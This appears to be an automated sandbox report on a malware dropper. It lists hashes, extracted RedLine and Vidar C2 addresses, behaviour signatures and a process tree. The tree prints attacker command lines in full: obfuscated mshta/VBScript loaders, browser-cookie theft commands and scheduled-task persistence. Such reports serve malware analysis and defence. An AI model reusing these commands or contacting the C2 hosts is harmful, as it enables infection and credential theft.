Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1248s
  • max time network
    1813s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-08-2021 12:53

General

  • Target

    Setup (14).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

24.08

C2

95.181.172.100:55640

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 10 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 13 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 27 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 31 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 50 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 18 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    PID:2824
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies registry class
      PID:6060
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2788
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2780
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2536
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2520
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1948
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1428
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1384
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1192
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1104
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:60
                      • C:\Users\Admin\AppData\Roaming\evieihi
                        C:\Users\Admin\AppData\Roaming\evieihi
                        2⤵
                          PID:9876
                        • C:\Users\Admin\AppData\Roaming\daieihi
                          C:\Users\Admin\AppData\Roaming\daieihi
                          2⤵
                            PID:9920
                          • C:\Users\Admin\AppData\Roaming\grieihi
                            C:\Users\Admin\AppData\Roaming\grieihi
                            2⤵
                              PID:9904
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                            1⤵
                              PID:1004
                            • C:\Users\Admin\AppData\Local\Temp\Setup (14).exe
                              "C:\Users\Admin\AppData\Local\Temp\Setup (14).exe"
                              1⤵
                              • Checks computer location settings
                              • Modifies system certificate store
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:3184
                              • C:\Users\Admin\Documents\DmwSAIMa0QVUgSWBCjJL9mr8.exe
                                "C:\Users\Admin\Documents\DmwSAIMa0QVUgSWBCjJL9mr8.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1468
                                • C:\Users\Admin\Documents\DmwSAIMa0QVUgSWBCjJL9mr8.exe
                                  "C:\Users\Admin\Documents\DmwSAIMa0QVUgSWBCjJL9mr8.exe"
                                  3⤵
                                    PID:3276
                                • C:\Users\Admin\Documents\LSbVjiQr2WKZQPCEZJ6NSkcE.exe
                                  "C:\Users\Admin\Documents\LSbVjiQr2WKZQPCEZJ6NSkcE.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:904
                                  • C:\Users\Admin\Documents\LSbVjiQr2WKZQPCEZJ6NSkcE.exe
                                    C:\Users\Admin\Documents\LSbVjiQr2WKZQPCEZJ6NSkcE.exe
                                    3⤵
                                    • Executes dropped EXE
                                    PID:5024
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 24
                                      4⤵
                                      • Program crash
                                      PID:5072
                                • C:\Users\Admin\Documents\XLvkqVVyfWlNJ753dqHoEn1X.exe
                                  "C:\Users\Admin\Documents\XLvkqVVyfWlNJ753dqHoEn1X.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2488
                                  • C:\Users\Admin\AppData\Roaming\7939230.exe
                                    "C:\Users\Admin\AppData\Roaming\7939230.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1332
                                  • C:\Users\Admin\AppData\Roaming\8750861.exe
                                    "C:\Users\Admin\AppData\Roaming\8750861.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    PID:5088
                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      PID:2820
                                  • C:\Users\Admin\AppData\Roaming\5575073.exe
                                    "C:\Users\Admin\AppData\Roaming\5575073.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4104
                                  • C:\Users\Admin\AppData\Roaming\4572085.exe
                                    "C:\Users\Admin\AppData\Roaming\4572085.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3312
                                • C:\Users\Admin\Documents\pZI_aMeCNHh9Oic2HSxRMifK.exe
                                  "C:\Users\Admin\Documents\pZI_aMeCNHh9Oic2HSxRMifK.exe"
                                  2⤵
                                    PID:2576
                                    • C:\Users\Admin\Documents\pZI_aMeCNHh9Oic2HSxRMifK.exe
                                      "C:\Users\Admin\Documents\pZI_aMeCNHh9Oic2HSxRMifK.exe" -q
                                      3⤵
                                      • Executes dropped EXE
                                      PID:5040
                                  • C:\Users\Admin\Documents\HCHUKVC_FxGfxC64brBbtO7M.exe
                                    "C:\Users\Admin\Documents\HCHUKVC_FxGfxC64brBbtO7M.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2804
                                  • C:\Users\Admin\Documents\bHWJz04616OiUn6GaHPOgi3P.exe
                                    "C:\Users\Admin\Documents\bHWJz04616OiUn6GaHPOgi3P.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:1424
                                  • C:\Users\Admin\Documents\JulDBcAE3cYu_6JdeyNXYaLQ.exe
                                    "C:\Users\Admin\Documents\JulDBcAE3cYu_6JdeyNXYaLQ.exe"
                                    2⤵
                                      PID:1068
                                      • C:\Documents and Settings\mshta.exe
                                        "C:\Documents and Settings\mshta.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of SetWindowsHookEx
                                        PID:5556
                                    • C:\Users\Admin\Documents\O4zT7UlmtdDzqVf1ih0cIP91.exe
                                      "C:\Users\Admin\Documents\O4zT7UlmtdDzqVf1ih0cIP91.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3440
                                    • C:\Users\Admin\Documents\oyyvH01W2e5aMKwNJTuBQMOa.exe
                                      "C:\Users\Admin\Documents\oyyvH01W2e5aMKwNJTuBQMOa.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Drops file in Program Files directory
                                      • Suspicious use of WriteProcessMemory
                                      PID:3404
                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        PID:4344
                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        PID:4388
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                            PID:5488
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            4⤵
                                              PID:6900
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              4⤵
                                                PID:8324
                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Drops startup file
                                              PID:4312
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                • Executes dropped EXE
                                                PID:5776
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                4⤵
                                                • Executes dropped EXE
                                                PID:5968
                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                • Executes dropped EXE
                                                PID:5992
                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                4⤵
                                                • Executes dropped EXE
                                                PID:2972
                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                  PID:6080
                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                  4⤵
                                                    PID:2920
                                              • C:\Users\Admin\Documents\BgM3mUaqFbPZBFjLbpjvEfBT.exe
                                                "C:\Users\Admin\Documents\BgM3mUaqFbPZBFjLbpjvEfBT.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:3372
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 660
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Program crash
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2576
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 684
                                                  3⤵
                                                  • Program crash
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4784
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 664
                                                  3⤵
                                                  • Program crash
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:192
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 700
                                                  3⤵
                                                  • Program crash
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4544
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 1076
                                                  3⤵
                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                  • Program crash
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5588
                                              • C:\Users\Admin\Documents\IyqrX83fOF4uvj_sKwUwZbaW.exe
                                                "C:\Users\Admin\Documents\IyqrX83fOF4uvj_sKwUwZbaW.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:612
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\IyqrX83fOF4uvj_sKwUwZbaW.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\IyqrX83fOF4uvj_sKwUwZbaW.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                  3⤵
                                                    PID:4628
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\IyqrX83fOF4uvj_sKwUwZbaW.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\IyqrX83fOF4uvj_sKwUwZbaW.exe" ) do taskkill -IM "%~nXW" -f
                                                      4⤵
                                                        PID:4280
                                                        • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                          WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:4588
                                                          • C:\Windows\SysWOW64\mshta.exe
                                                            "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                            6⤵
                                                              PID:3948
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                7⤵
                                                                  PID:3944
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                6⤵
                                                                  PID:6000
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill -IM "IyqrX83fOF4uvj_sKwUwZbaW.exe" -f
                                                                5⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1172
                                                        • C:\Users\Admin\Documents\GJyXXnVJf96mV8Qbpk2_e6aq.exe
                                                          "C:\Users\Admin\Documents\GJyXXnVJf96mV8Qbpk2_e6aq.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Checks BIOS information in registry
                                                          • Checks whether UAC is enabled
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:296
                                                        • C:\Users\Admin\Documents\3v8imR2YudnMKl0lu6pcIC0c.exe
                                                          "C:\Users\Admin\Documents\3v8imR2YudnMKl0lu6pcIC0c.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:2204
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 252
                                                            3⤵
                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                            • Program crash
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1664
                                                        • C:\Users\Admin\Documents\ogIOJ5jQ0oHiM6wi8ixSA6dt.exe
                                                          "C:\Users\Admin\Documents\ogIOJ5jQ0oHiM6wi8ixSA6dt.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:2264
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "ogIOJ5jQ0oHiM6wi8ixSA6dt.exe" /f & erase "C:\Users\Admin\Documents\ogIOJ5jQ0oHiM6wi8ixSA6dt.exe" & exit
                                                            3⤵
                                                              PID:5096
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /im "ogIOJ5jQ0oHiM6wi8ixSA6dt.exe" /f
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:4572
                                                          • C:\Users\Admin\Documents\XGefZbY6YQeALZ_P8Hne0OYP.exe
                                                            "C:\Users\Admin\Documents\XGefZbY6YQeALZ_P8Hne0OYP.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:3496
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 476
                                                              3⤵
                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                              • Program crash
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4120
                                                          • C:\Users\Admin\Documents\rX7EluRdbu6eMIcaczLLJ1vq.exe
                                                            "C:\Users\Admin\Documents\rX7EluRdbu6eMIcaczLLJ1vq.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2328
                                                          • C:\Users\Admin\Documents\7DXSOTQ37xnUbg6Kwa7was7e.exe
                                                            "C:\Users\Admin\Documents\7DXSOTQ37xnUbg6Kwa7was7e.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:2308
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 896
                                                              3⤵
                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                              • Program crash
                                                              PID:5712
                                                          • C:\Users\Admin\Documents\uVQTcEECi1BAvOEH1vst8UBp.exe
                                                            "C:\Users\Admin\Documents\uVQTcEECi1BAvOEH1vst8UBp.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:3952
                                                            • C:\Users\Admin\Documents\uVQTcEECi1BAvOEH1vst8UBp.exe
                                                              C:\Users\Admin\Documents\uVQTcEECi1BAvOEH1vst8UBp.exe
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:5080
                                                            • C:\Users\Admin\Documents\uVQTcEECi1BAvOEH1vst8UBp.exe
                                                              C:\Users\Admin\Documents\uVQTcEECi1BAvOEH1vst8UBp.exe
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4424
                                                          • C:\Users\Admin\Documents\Rcp_lYXmbB36Zp3252H6DGE3.exe
                                                            "C:\Users\Admin\Documents\Rcp_lYXmbB36Zp3252H6DGE3.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:3972
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 388
                                                              3⤵
                                                              • Program crash
                                                              PID:5748
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 368
                                                              3⤵
                                                              • Program crash
                                                              PID:3968
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 404
                                                              3⤵
                                                              • Program crash
                                                              PID:5944
                                                            • C:\Users\Admin\Documents\Rcp_lYXmbB36Zp3252H6DGE3.exe
                                                              "C:\Users\Admin\Documents\Rcp_lYXmbB36Zp3252H6DGE3.exe"
                                                              3⤵
                                                              • Modifies data under HKEY_USERS
                                                              PID:10056
                                                          • C:\Users\Admin\Documents\56sDM8FPHBIcnF90k4ibjGDs.exe
                                                            "C:\Users\Admin\Documents\56sDM8FPHBIcnF90k4ibjGDs.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Checks BIOS information in registry
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4064
                                                          • C:\Users\Admin\Documents\E6Q53wD8I9Tm2HSTTYMJwuhS.exe
                                                            "C:\Users\Admin\Documents\E6Q53wD8I9Tm2HSTTYMJwuhS.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Checks BIOS information in registry
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4008
                                                          • C:\Users\Admin\Documents\ghiItEdKUIQJ3RbVaX9tqago.exe
                                                            "C:\Users\Admin\Documents\ghiItEdKUIQJ3RbVaX9tqago.exe"
                                                            2⤵
                                                              PID:2916
                                                              • C:\Users\Admin\Documents\ghiItEdKUIQJ3RbVaX9tqago.exe
                                                                "C:\Users\Admin\Documents\ghiItEdKUIQJ3RbVaX9tqago.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Checks SCSI registry key(s)
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:312
                                                            • C:\Users\Admin\Documents\O8Cs7emUPFAF71iifz0tUD4Y.exe
                                                              "C:\Users\Admin\Documents\O8Cs7emUPFAF71iifz0tUD4Y.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:4332
                                                              • C:\Users\Admin\AppData\Local\Temp\is-483JO.tmp\O8Cs7emUPFAF71iifz0tUD4Y.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-483JO.tmp\O8Cs7emUPFAF71iifz0tUD4Y.tmp" /SL5="$400C8,138429,56832,C:\Users\Admin\Documents\O8Cs7emUPFAF71iifz0tUD4Y.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:4608
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:1232
                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:4556
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "IyqrX83fOF4uvj_sKwUwZbaW" /sc ONLOGON /tr "'C:\Users\Admin\Documents\ConvertToClear\IyqrX83fOF4uvj_sKwUwZbaW.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Creates scheduled task(s)
                                                            PID:3408
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\CoreShellAPI\dllhost.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • Process spawned unexpected child process
